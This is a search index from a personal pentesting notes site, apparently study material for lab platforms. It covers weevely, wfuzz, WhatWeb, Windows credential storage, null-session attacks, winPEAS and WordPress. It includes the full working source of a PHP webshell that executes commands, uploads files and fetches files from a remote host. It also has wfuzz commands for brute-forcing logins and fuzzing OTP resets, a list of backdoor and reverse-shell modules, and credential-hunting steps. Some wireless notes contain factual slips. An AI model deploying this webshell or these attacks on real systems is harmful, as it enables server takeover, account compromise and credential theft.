                            ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-complete-list-of-commands","title":"weevely complete list of commands","text":"Module Description :audit_filesystem Audit the file system for weak permissions. :audit_suidsgid Find files with SUID or SGID flags. :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd Read /etc/passwd with different techniques. :audit_phpconf Audit PHP configuration. :shell_sh Execute shell commands. :shell_su Execute commands with su. :shell_php Execute PHP commands. :system_extensions Collect PHP and webserver extension list. :system_info Collect system information. :system_procs List running processes. :backdoor_reversetcp Execute a reverse TCP shell. :backdoor_tcp Spawn a shell on a TCP port. :bruteforce_sql Bruteforce SQL database. :file_gzip Compress or expand gzip files. :file_clearlog Remove string from a file. :file_check Get attributes and permissions of a file. :file_upload Upload file to remote filesystem. :file_webdownload Download an URL. :file_tar Compress or expand tar archives. :file_download Download file from remote filesystem. :file_bzip2 Compress or expand bzip2 files. :file_edit Edit remote file on a local editor. :file_grep Print lines matching a pattern in multiple files. :file_ls List directory content. :file_cp Copy single file. :file_rm Remove remote file. :file_upload2web Upload file automatically to a web folder and get corres :file_zip Compress or expand zip files. :file_touch Change file timestamp. :file_find Find files with given names and attributes. :file_mount Mount remote filesystem using HTTPfs. :file_enum Check existence and permissions of a list of paths. :file_read Read remote file from the remote filesystem. :file_cd Change current working directory. :sql_console Execute SQL query or run console. :sql_dump Multi dbms mysqldump replacement. :net_mail Send mail. :net_phpproxy Install PHP proxy on the target. :net_curl Perform a curl-like HTTP request. :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the :net_scan TCP Port scan. :net_ifconfig Get network interfaces addresses.","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"wfuzz/","title":"wfuzz","text":"","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#basic-commands","title":"Basic commands","text":"
                            wfuzz -d '{\"email\":\"hapihacker@hapihacker.com\",\"password\":\"PASSWORD\"}' -H 'Content-Type: application/json'-z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. You use a -H flag for each header\n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n
                            # Fuzzing an old api version which doesn't implement a request limit when resetting password. It allows us to FUZZ the OTP and reset the password for any user.\nwfuzz -d '{\"email\":\"hapihacker@hapihacker.com\", \"otp\":\"FUZZ\" \"password\":\"NewPasswordreseted\"}' -H 'Content-Type: application/json'-z file,/usr/share/wordlists/SecLists-master/Fuzzing/4-digits-0000-9999.txt -u http://localhost:8888/identity/api/auth/v2/check-otp  --hc 500\n

                            Subdomain enumeration:

                            wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n
                            ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#encoding","title":"Encoding","text":"
                            # Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hackig-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separated requests.  \nwfuzz -z list,a,base64-md5-none \n# this results in three payloads: one encoded in base64, another in md5 and last with none. \n\n# Each payload will be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hackig-example.com/api/v2/FUZZ\n
                            ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#dealing-with-rate-limits-in-apis","title":"Dealing with rate limits (in APIs)","text":"
                            -s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n
                            ","tags":["pentesting","web pentesting"]},{"location":"whatweb/","title":"whatweb","text":"

                            WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#installation","title":"Installation","text":"

                            Already installed in Kali.

                            Download from: https://github.com/urbanadventurer/WhatWeb

                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#basic-usage","title":"Basic usage","text":"
                            # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors 10.10.10.0/24\n\n\nwhatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whitewinterwolf-webshell/","title":"WhiteWinterWolf php webshell","text":"

                            Source: https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php.

                            It is similar to the Antak Webshell in aspx from the nishang project but with php. It generates a page on the server from which we can indicate the ip and port where we want to receive the output of the commands we introduce,

                            <?php\n/*******************************************************************************\n * Copyright 2017 WhiteWinterWolf\n * https://www.whitewinterwolf.com/tags/php-webshell/\n *\n * This file is part of wwolf-php-webshell.\n *\n * wwwolf-php-webshell is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program.  If not, see <http://www.gnu.org/licenses/>.\n ******************************************************************************/\n\n/*\n * Optional password settings.\n * Use the 'passhash.sh' script to generate the hash.\n * NOTE: the prompt value is tied to the hash!\n */\n$passprompt = \"WhiteWinterWolf's PHP webshell: \";\n$passhash = \"\";\n\nfunction e($s) { echo htmlspecialchars($s, ENT_QUOTES); }\n\nfunction h($s)\n{\n    global $passprompt;\n    if (function_exists('hash_hmac'))\n    {\n        return hash_hmac('sha256', $s, $passprompt);\n    }\n    else\n    {\n        return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));\n    }\n}\n\nfunction fetch_fopen($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    if (strpos($host, '://') === false)\n    {\n        $host = 'http://' . $host;\n    }\n    else\n    {\n        $host = str_replace(array('ssl://', 'tls://'), 'https://', $host);\n    }\n    $rh = fopen(\"${host}:${port}${src}\", 'rb');\n    if ($rh !== false)\n    {\n        $wh = fopen($dst, 'wb');\n        if ($wh !== false)\n        {\n            $cbytes = 0;\n            while (! feof($rh))\n            {\n                $cbytes += fwrite($wh, fread($rh, 1024));\n            }\n            fclose($wh);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (${cbytes} bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($rh);\n    }\n    else\n    {\n        $ret = \"${err} Failed to open URL <i>${host}:${port}${src}</i><br />\";\n    }\n    return $ret;\n}\n\nfunction fetch_sock($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    $host = str_replace('https://', 'tls://', $host);\n    $s = fsockopen($host, $port);\n    if ($s)\n    {\n        $f = fopen($dst, 'wb');\n        if ($f)\n        {\n            $buf = '';\n            $r = array($s);\n            $w = NULL;\n            $e = NULL;\n            fwrite($s, \"GET ${src} HTTP/1.0\\r\\n\\r\\n\");\n            while (stream_select($r, $w, $e, 5) && !feof($s))\n            {\n                $buf .= fread($s, 1024);\n            }\n            $buf = substr($buf, strpos($buf, \"\\r\\n\\r\\n\") + 4);\n            fwrite($f, $buf);\n            fclose($f);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (\" . strlen($buf) . \" bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($s);\n    }\n    else\n    {\n        $ret .= \"${err} Failed to connect to <i>${host}:${port}</i><br />\";\n    }\n    return $ret;\n}\n\nini_set('log_errors', '0');\nini_set('display_errors', '1');\nerror_reporting(E_ALL);\n\nwhile (@ ob_end_clean());\n\nif (! isset($_SERVER))\n{\n    global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;\n    $_FILES = &$HTTP_POST_FILES;\n    $_POST = &$HTTP_POST_VARS;\n    $_SERVER = &$HTTP_SERVER_VARS;\n}\n\n$auth = '';\n$cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];\n$cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];\n$fetch_func = 'fetch_fopen';\n$fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];\n$fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];\n$fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];\n$pass = empty($_POST['pass']) ? '' : $_POST['pass'];\n$url = $_SERVER['REQUEST_URI'];\n$status = '';\n$ok = '&#9786; :';\n$warn = '&#9888; :';\n$err = '&#9785; :';\n\nif (! empty($passhash))\n{\n    if (function_exists('hash_hmac') || function_exists('mhash'))\n    {\n        $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];\n        if (h($auth) !== $passhash)\n        {\n            ?>\n                <form method=\"post\" action=\"<?php e($url); ?>\">\n                    <?php e($passprompt); ?>\n                    <input type=\"password\" size=\"15\" name=\"pass\">\n                    <input type=\"submit\" value=\"Send\">\n                </form>\n            <?php\n            exit;\n        }\n    }\n    else\n    {\n        $status .= \"${warn} Authentication disabled ('mhash()' missing).<br />\";\n    }\n}\n\nif (! ini_get('allow_url_fopen'))\n{\n    ini_set('allow_url_fopen', '1');\n    if (! ini_get('allow_url_fopen'))\n    {\n        if (function_exists('stream_select'))\n        {\n            $fetch_func = 'fetch_sock';\n        }\n        else\n        {\n            $fetch_func = '';\n            $status .= \"${warn} File fetching disabled ('allow_url_fopen'\"\n                . \" disabled and 'stream_select()' missing).<br />\";\n        }\n    }\n}\nif (! ini_get('file_uploads'))\n{\n    ini_set('file_uploads', '1');\n    if (! ini_get('file_uploads'))\n    {\n        $status .= \"${warn} File uploads disabled.<br />\";\n    }\n}\nif (ini_get('open_basedir') && ! ini_set('open_basedir', ''))\n{\n    $status .= \"${warn} open_basedir = \" . ini_get('open_basedir') . \"<br />\";\n}\n\nif (! chdir($cwd))\n{\n  $cwd = getcwd();\n}\n\nif (! empty($fetch_func) && ! empty($fetch_path))\n{\n    $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);\n    $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);\n}\n\nif (ini_get('file_uploads') && ! empty($_FILES['upload']))\n{\n    $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);\n    if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))\n    {\n        $status .= \"${ok} Uploaded file <i>${dest}</i> (\" . $_FILES['upload']['size'] . \" bytes)<br />\";\n    }\n}\n?>\n\n<form method=\"post\" action=\"<?php e($url); ?>\"\n    <?php if (ini_get('file_uploads')): ?>\n        enctype=\"multipart/form-data\"\n    <?php endif; ?>\n    >\n    <?php if (! empty($passhash)): ?>\n        <input type=\"hidden\" name=\"auth\" value=\"<?php e($auth); ?>\">\n    <?php endif; ?>\n    <table border=\"0\">\n        <?php if (! empty($fetch_func)): ?>\n            <tr><td>\n                <b>Fetch:</b>\n            </td><td>\n                host: <input type=\"text\" size=\"15\" id=\"fetch_host\" name=\"fetch_host\" value=\"<?php e($fetch_host); ?>\">\n                port: <input type=\"text\" size=\"4\" id=\"fetch_port\" name=\"fetch_port\" value=\"<?php e($fetch_port); ?>\">\n                path: <input type=\"text\" size=\"40\" id=\"fetch_path\" name=\"fetch_path\" value=\"\">\n            </td></tr>\n        <?php endif; ?>\n        <tr><td>\n            <b>CWD:</b>\n        </td><td>\n            <input type=\"text\" size=\"50\" id=\"cwd\" name=\"cwd\" value=\"<?php e($cwd); ?>\">\n            <?php if (ini_get('file_uploads')): ?>\n                <b>Upload:</b> <input type=\"file\" id=\"upload\" name=\"upload\">\n            <?php endif; ?>\n        </td></tr>\n        <tr><td>\n            <b>Cmd:</b>\n        </td><td>\n            <input type=\"text\" size=\"80\" id=\"cmd\" name=\"cmd\" value=\"<?php e($cmd); ?>\">\n        </td></tr>\n        <tr><td>\n        </td><td>\n            <sup><a href=\"#\" onclick=\"cmd.value=''; cmd.focus(); return false;\">Clear cmd</a></sup>\n        </td></tr>\n        <tr><td colspan=\"2\" style=\"text-align: center;\">\n            <input type=\"submit\" value=\"Execute\" style=\"text-align: right;\">\n        </td></tr>\n    </table>\n\n</form>\n<hr />\n\n<?php\nif (! empty($status))\n{\n    echo \"<p>${status}</p>\";\n}\n\necho \"<pre>\";\nif (! empty($cmd))\n{\n    echo \"<b>\";\n    e($cmd);\n    echo \"</b>\\n\";\n    if (DIRECTORY_SEPARATOR == '/')\n    {\n        $p = popen('exec 2>&1; ' . $cmd, 'r');\n    }\n    else\n    {\n        $p = popen('cmd /C \"' . $cmd . '\" 2>&1', 'r');\n    }\n    while (! feof($p))\n    {\n        echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);\n        @ flush();\n    }\n}\necho \"</pre>\";\n\nexit;\n?>\n
                            ","tags":["webshell","php"]},{"location":"window-detective/","title":"Window Detective - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"window-detective/#installation","title":"Installation","text":"

                            Download it from: \u00a0Window Detective

                            ","tags":["pentesting","windows","thick client"]},{"location":"windows-binaries/","title":"Windows binaries - LOLBAS - LOLBAS","text":"

                            Equivalent to suid binaries from linux in Windows would be: LOLBAS: https://lolbas-project.github.io/ (Living Off The Land Binaries, Scripts and Libraries),

                            ","tags":["pentesting","privilege escalation","windows"]},{"location":"windows-credentials-storage/","title":"Windows credentials storage","text":"

                            Microsoft documentation.

                            ","tags":["windows"]},{"location":"windows-credentials-storage/#how-login-happens","title":"How login happens","text":"

                            The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer.

                            Source: HackTheBox Academy. Module Password attacks.

                            ","tags":["windows"]},{"location":"windows-credentials-storage/#lsass","title":"LSASS","text":"

                            Local Security Authority Subsystem Service (LSASS) is a collection of many modules and has access to all authentication processes that can be found in %SystemRoot%\\System32\\Lsass.exe. This service is responsible for the local system security policy, user authentication, and sending security audit logs to the Event log.

                            The LSA has the following components:

                            Netlogon.dll . The Net Logon service. Net Logon maintains the computer's secure channel to a domain controller. It passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers and user rights for the user. In Windows\u00a02000, the Net Logon service uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers. Net Logon is the replication protocol for Microsoft\u00ae Windows\u00a0NT\u00ae version\u00a04.0 primary domain controllers and backup domain controllers.

                            Msv1_0.dll . The NTLM authentication protocol. This protocol authenticates clients that do not use Kerberos authentication.

                            Schannel.dll . The Secure Sockets Layer (SSL) authentication protocol. This protocol provides authentication over an encrypted channel instead of a less-secure clear channel.

                            Kerberos.dll . The Kerberos\u00a0v5 authentication protocol.

                            Kdcsvc.dll . The Kerberos Key Distribution Center (KDC) service, which is responsible for granting ticket-granting tickets to clients.

                            Lsasrv.dll . The LSA server service, which enforces security policies.

                            Samsrv.dll . The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies, and supports APIs.

                            Ntdsa.dll . The directory service module, which supports the Windows\u00a02000 replication protocol and Lightweight Directory Access Protocol (LDAP), and manages partitions of data.

                            Secur32.dll . The multiple authentication provider that holds all of the components together.

                            Upon initial logon, LSASS will:

                            • Cache credentials locally in memory
                            • Create access tokens
                            • Enforce security policies
                            • Write to Windows security log
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#gina","title":"GINA","text":"

                            Each interactive logon session creates a separate instance of the Winlogon service. The Graphical Identification and Authentication (GINA) architecture is loaded into the process area used by Winlogon, receives and processes the credentials, and invokes the authentication interfaces via the LSALogonUser function.

                            ","tags":["windows"]},{"location":"windows-credentials-storage/#sam-database","title":"SAM Database","text":"

                            The Security Account Manager (SAM) is a database file in Windows operating systems that stores users' passwords. It can be used to authenticate local and remote users. User passwords are stored in a hash format in a registry structure as either an LM hash or an NTLM hash. This file is located in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.

                            SYSTEM level permissions are required to view it.

                            Windows systems can be assigned to either a workgroup or domain during setup. If the system has been assigned to a workgroup, it handles the SAM database locally and stores all existing users locally in this database. However, if the system has been joined to a domain, the Domain Controller (DC) must validate the credentials from the Active Directory database (ntds.dit), which is stored in %SystemRoot%\\ntds.dit.

                            Microsoft introduced a security feature in Windows NT 4.0 to help improve the security of the SAM database against offline software cracking. This is the SYSKEY (syskey.exe) feature, which, when enabled, partially encrypts the hard disk copy of the SAM file so that the password hash values for all local accounts stored in the SAM are encrypted with a key.

                            Credential Manager is a feature built-in to all Windows operating systems that allows users to save the credentials they use to access various network resources and websites. Saved credentials are stored based on user profiles in each user's Credential Locker. Credentials are encrypted and stored at the following location:

                            PS C:\\Users\\[Username]\\AppData\\Local\\Microsoft\\[Vault/Credentials]\\\n
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#domain-controllers","title":"Domain Controllers","text":"

                            Each Domain Controller hosts a file called NTDS.dit that is kept synchronized across all Domain Controllers with the exception of Read-Only Domain Controllers. NTDS.dit is a database file that stores the data in Active Directory, including but not limited to:

                            • User accounts (username & password hash)
                            • Group accounts
                            • Computer accounts
                            • Group policy objects
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#tools-for-dumping-credentials","title":"Tools for dumping credentials","text":"
                            • CrackMapExec.
                            • John The Ripper.
                            • Hydra.
                            • Metasploit.
                            • Mimikatz.
                            • pypykatz.
                            • Lazagne.
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#findstr","title":"findstr","text":"

                            We can also use findstr to search from patterns across many types of files.

                            C:\\> findstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
                            ","tags":["windows"]},{"location":"windows-null-session-attack/","title":"Windows Null session attack","text":"

                            It\u2019s used to enumerate info (password, system users, system groups. running system processes). A null session attack exploits an authentification vulnerability for Windows Administrative Shares. This lets an attacker connect to a local or remote share without authentification.

                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-windows","title":"Manually from Windows","text":"
                            1. Enumerate File Server services:
                            nbtstat -A $ip \u00a0\n\n# ELS-WINXP \u00a0 <00> \u00a0 UNIQUE \u00a0 Registered\n# <00> tells us ELS-WINXP is a workstation.\n# <20> says that the file sharing service is up and running on the machine\n# UNIQUE tells us that this compiter must have only one IP address assigned\n
                            1. Enumerate Windows Shares. Once we spot a machine with the File Server service running, we can enumerate:
                            NET VIEW $ip\n
                            1. Verify if a null attack is possible by exploiting the IPC$ administrative share and trying to connect without valid credentials.
                            NET USE \\\\$ip\\IPC$ \u2018\u2019 /u:\u2019\u2019\n

                            This tells Windows to connect to the IPC$ share by using an empty password and a empty username. It only works with IPC$ (not c$).

                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-linux","title":"Manually from Linux","text":"

                            Using the samba suite: https://www.samba.org/

                            1. Enumerate File Server services:
                            nmblookup -A $ip\n
                            1. Also with the smbclient we can enumerate the shares provides by a host:
                            smbclient -L //$ip -N\n\n# -L\u00a0 Look at what services are available on a target\n# $ip\u00a0Prepend the two slahes\n# -N \u00a0Force the tool not to ask for a password\n
                            1. Connect:
                            smbclient \\\\$ip\\sharedfolder -N\n

                            Be careful, sometimes the shell removes the slashes and you need to escape them.

                            1. Once connected you can browse with the smb command line. To see allowed commands: help
                            2. When you know the path of a file and you want to retrieve it:

                              • from kali:
                                smbget smb://$ip/SharedFolder/flag_1.txt\n
                              • from smb command line:
                                get flag_1.txt\n
                            3. To map users with permissions

                            smbmap -H demo.ine.local\n

                            To get an specific file in a connection: get flag.txt

                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#tricks","title":"Tricks","text":"

                            Enumerate users with enum4linux -U demo.ine.local

                            Enumerate the permissions of users with smbmap -H demo.ine.local

                            If some users are missing in the permission list, maybe they are accesible, try with:

                            smbclient -L //$ip\\<user> -N\n
                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#more-tools","title":"More tools","text":"
                            • Winfo.
                            • enum.
                            • enum4linux.
                            • SAMRDump.
                            ","tags":["pentesting windows"]},{"location":"windows-privilege-escalation-history/","title":"Windows: Privilege Escalation - Recently accessed files and executed commands","text":"

                            Check recently accessed files/executed commands. Mostly (default) our console history will be saved in

                            C:\\Users\\<account_name>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt . \n
                            ","tags":["windows","privilege escalation"]},{"location":"winfo/","title":"Winfo","text":"

                            Winfo uses Null Session attacks to retrieve account and share information from Windows NT.

                            ","tags":["pentesting windows"]},{"location":"winfo/#installation","title":"Installation","text":"

                            Download it from: https://packetstormsecurity.com/search/?q=winfo&s=files.

                            ","tags":["pentesting windows"]},{"location":"winfo/#basic-command","title":"Basic command","text":"
                            winfo.exe $ip -n\n
                            ","tags":["pentesting windows"]},{"location":"winpeas/","title":"Windows Privilege Escalation Awesome Scripts: winPEAS","text":"

                            And that is exactly what winPEAS stands for: windows Privilege Escalation Awesome Scripts.

                            Download it from https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS.

                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#what-it-does","title":"What it does","text":"
                            • Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz that I'm copypasting below.
                            • Provide information about how to exploit misconfigurations.

                            In the github repo, you will see two files: a .bat and an .exe version.

                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#checklist-for-local-windows-privilege-escalation","title":"Checklist for Local windows Privilege Escalation","text":"

                            Source: winPEAS README.md file.

                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#system-info","title":"System Info","text":"
                            • Obtain System information
                            • Search for kernel exploits using scripts.
                            • Use Google to search for kernel exploits
                            • Use searchsploit to search for kernel exploits
                            • Interesting info in env vars?
                            • Passwords in PowerShell history?
                            • Interesting info in Internet settings?
                            • Drives
                            • WSUS exploit?
                            • AlwaysInstallElevated?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#loggingav-enumeration","title":"Logging/AV enumeration","text":"
                            • Check Audit and WEF
                            • Check LAPS
                            • Check if WDigest is active
                            • LSA Protection?
                            • Credentials Guard
                            • Cached Credentials?
                            • Check if any AV
                            • AppLocker Policy?
                            • UAC
                            • User Privileges
                            • Check current user privilege
                            • Are you member of any privileged group
                            • Check if you have any of these tokens enabled: SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege?
                            • Users Sessions?
                            • Check users homes (access?)
                            • Check Password Policy
                            • What is inside the Clipboard?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network","title":"Network","text":"
                            • Check current network informatio
                            • Check hidden local services restricted to the outside
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#running-processes","title":"Running Processes","text":"
                            • Processes binaries file and folders permission
                            • Memory Password mining
                            • Insecure GUI apps
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#services","title":"Services","text":"
                            • Can you modify any service
                            • Can you modify the binary that is executed by any service
                            • Can you modify the registry of any service
                            • Can you take advantage of any unquoted service binary path
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#applications","title":"Applications","text":"
                            • Write permissions on installed applications
                            • Startup Applications
                            • Vulnerable Drivers
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#dll-hijacking","title":"DLL Hijacking","text":"
                            • Can you write in any folder inside PATH?
                            • Is there any known service binary that tries to load any non-existant DLL?
                            • Can you write in any binaries folder?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network_1","title":"Network","text":"
                            • Enumerate the network (shares, interfaces, routes, neighbours, ...)
                            • Take a special look at network services listening on localhost (127.0.0.1)
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#windows-credentials","title":"Windows Credentials","text":"
                            • Winlogon.
                            • Windows Vault.
                            • Interesting DPAPI credentials.
                            • Passwords of saved Wifi networks.
                            • Interesting info in saved RDP Connections.
                            • Passwords in recently run commands.
                            • Remote Desktop Credentials Manager.
                            • AppCmd.exe exists.
                            • SCClient.exe.
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#files-and-registry-credentials","title":"Files and Registry (Credentials)","text":"
                            • Putty: Creds.
                            • SSH keys in registry.
                            • Passwords in unattended files.
                            • Any SAM & SYSTEM.
                            • Cloud credentials.
                            • McAfee SiteList.xml.
                            • Cached GPP Password?
                            • Password in IIS Web config file.
                            • Interesting info in web logs.
                            • Do you want to ask for credentials
                            • Interesting files inside the Recycle Bin.
                            • Other registry containing credentials.
                            • Inside Browser data.
                            • Generic password search.
                            • Tools.
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#leaked-handlers","title":"Leaked Handlers","text":"
                            • Have you access to any handler of a process run by administrator?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#pipe-client-impersonation","title":"Pipe Client Impersonation","text":"","tags":["windows","privilege escalation"]},{"location":"winspy/","title":"winspy - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"winspy/#installation","title":"Installation","text":"

                            Download it from https://www.catch22.net/software/winspy

                            ","tags":["pentesting","windows","thick client"]},{"location":"winspy/#what-it-does","title":"What it does","text":"

                            Basically winspy allows us to \u00a0select and view the properties of any window in the system. WinSpy is based around the Spy++ utility that ships with Microsoft Visual Studio.

                            It allows us to retrieve passwords from password-edit controls.

                            Here an example:

                            ![[Pasted image 20230201192438.png]]

                            Another nice example:

                            ![[Pasted image 20230201192528.png]]

                            Here a list of all windows properties that it retrieves:

                            • Window Class and Name.
                            • Window procedure address.
                            • All window styles and extended styles.
                            • Window properties (set using the SetProp API call).
                            • Complete Child and Sibling window relationships.
                            • Scrollbar positional information.
                            • Full window Class information.
                            • Retrieve passwords from password-edit controls!
                            • Edit window styles!
                            • Alter window captions!
                            • Show / Hide / Enable / Disable / Adjust any window in the system!
                            • Massively improved user-interface!
                            • View the complete system window hierarchy!
                            • Multi-monitor support!
                            • Now works correctly for all versions of Windows.
                            • Tree hierarchy now groups by process.
                            ","tags":["pentesting","windows","thick client"]},{"location":"wireless-security/","title":"Wireless security","text":""},{"location":"wireless-security/#basic-concepts","title":"Basic concepts","text":"Name Explanation MAC address A unique identifier for the device's wireless adapter. SSID The network name, also known as the Service Set Identifier of the WiFi network. Supported data rates A list of the data rates the device can communicate. Supported channels A list of the channels (frequencies) on which the device can communicate. Supported security protocols A list of the security protocols that the device is capable of using, such as WPA2/WPA3.

                            Wired Equivalent Privacy: WEP

                            Wi-Fi Protected Access: WPA

                            "},{"location":"wireless-security/#wep-challenge-response-handshake","title":"WEP Challenge-Response Handshake","text":"Step Who Description 1 Client Sends an association request packet to the WAP, requesting access. 2 WAP Responds with an association response packet to the client, which includes a challenge string. 3 Client Calculates a response to the challenge string and a shared secret key and sends it back to the WAP. 4 WAP Calculates the expected response to the challenge with the same shared secret key and sends an authentication response packet to the client.

                            Nevertheless, some packets can get lost, so the so-called CRC checksum has been integrated. Cyclic Redundancy Check (CRC) is an error-detection mechanism used in the WEP protocol to protect against data corruption in wireless communications.

                            "},{"location":"wireless-security/#encryption-protocols","title":"Encryption Protocols","text":"

                            We can use various encryption algorithms to protect the confidentiality of data transmitted over wireless networks. The most common encryption algorithms in WiFi networks are Wired Equivalent Privacy (WEP), WiFi Protected Access 2 (WPA2), and WiFi Protected Access 3 (WPA3).

                            "},{"location":"wireless-security/#wired-equivalent-privacy-wep","title":"Wired Equivalent Privacy: WEP","text":"

                            Very week with 63-bit and 128-bit encryption keys.

                            WEP uses the RC4 cipher encryption algorithm, which makes it vulnerable to attacks.

                            Passwords can be crack in minutes.

                            Superseded by WPA in 2003

                            "},{"location":"wireless-security/#wi-fi-protected-access-wpa","title":"Wi-Fi Protected Access: WPA","text":"

                            Developed by Wi-Fi Alliance

                            Massive security improvement over WEP with 256-bit encryption keys.

                            Superseded by WPA2 in 2006.

                            "},{"location":"wmctrl/","title":"wmctrl","text":"
                            sudo apt-get install wmctrl\n
                            #!/bin/bash\nwmctrl -s 0\n/bin/bash\nfirefox https://enterprise.hackthebox.com/login &\nobsidian &\nGoogle Chrome &\nriseup-vpn --start-vpn on \nsleep 5\nwmctrl -r /bin/bash -t 0\nwmctrl -r firefox -t 1\nwmctrl -r obsidian -t 2\nwmctrl -r riseup-vpn -t 3\nwmctrl -s 0\n
                            "},{"location":"wordpress-pentesting/","title":"Pentesting wordpress","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#important-wordpress-files-and-directories","title":"Important wordpress files and directories","text":"

                            Login/Authentication

                            • /wp-login.php (This is usually changed to /login.php for security)
                            • /wp-admin/login.php
                            • /wp-admin/wp-login.php
                            • xmlrpc.php - (Extensible Markup Language - Remote Procedure Call) is a protocol that allows external applications and services to interact with a WordPress site programmatically. This has been replaced by the WordPress REST API.

                            Directories

                            • /wp-content - Primary directory used to store plugins and themes.
